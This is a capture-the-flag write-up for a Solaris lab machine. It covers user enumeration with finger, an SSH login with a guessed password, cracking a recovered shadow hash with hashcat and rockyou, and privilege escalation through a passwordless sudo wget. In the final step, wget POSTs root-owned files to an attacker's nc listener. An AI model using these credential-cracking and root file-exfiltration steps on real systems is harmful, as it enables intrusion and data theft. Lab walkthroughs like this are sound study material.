[] Login name: sammy In real life: sammy Directory: /export/home/sammy Shell: /bin/bash Last login Tue Jun 19 17:20 on pts/2 from No unread mail No Plan.
Login name: xvm In real life: xVM User Directory: / Never logged in. No unread mail No Plan.
Login name: openldap In real life: OpenLDAP User Directory: / Never logged in. No unread mail No Plan.
Login name: nobody In real life: NFS Anonymous Access User Directory: / Never logged in. No unread mail No Plan.
Login name: noaccess In real life: No Access User Directory: / Never logged in. No unread mail No Plan.
Login name: nobody4 In real life: SunOS 4.x NFS Anonymous Access User Directory: / Never logged in. No unread mail No Plan.
Login name: root In real life: Super-User Directory: /root Shell: /usr/bin/bash Last login Tue Jun 19 17:25 on pts/2 from sunday New mail received Tue Apr 24 11:05:47 2018; unread since Tue Apr 24 11:05:46 2018 No Plan.
The smserverd is a Solaris server that handles request from applications, including the Volume Management daemon to access removable media devices.
Using finger we found out a bunch of users and the one with ssh enabled was:
ssh sunny@ -p 22022 with password sunday.
In /backup/shadow.backup we found a shadow file with both sammy and sunny hash:
LinEnum.sh, gently offered by someone in the machine (:D), didn’t find anything interesting.
The hash to crack is a salted sha256crypt (-m 7400 in hashcat) format: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB.
Using rockyou as wordlist the password is easly cracked: cooldude!.
SSH into the machine as sammy user we got the user flag in /export/home/sammy/Desktop/user.txt.
It’s possible to run wget as root without password because from sudo -l we can see: (root) NOPASSWD: /usr/bin/wget; since wget can POST files we can open a socket to our machine with nc -lvp 3445 and then send the flag file or any other files with wget.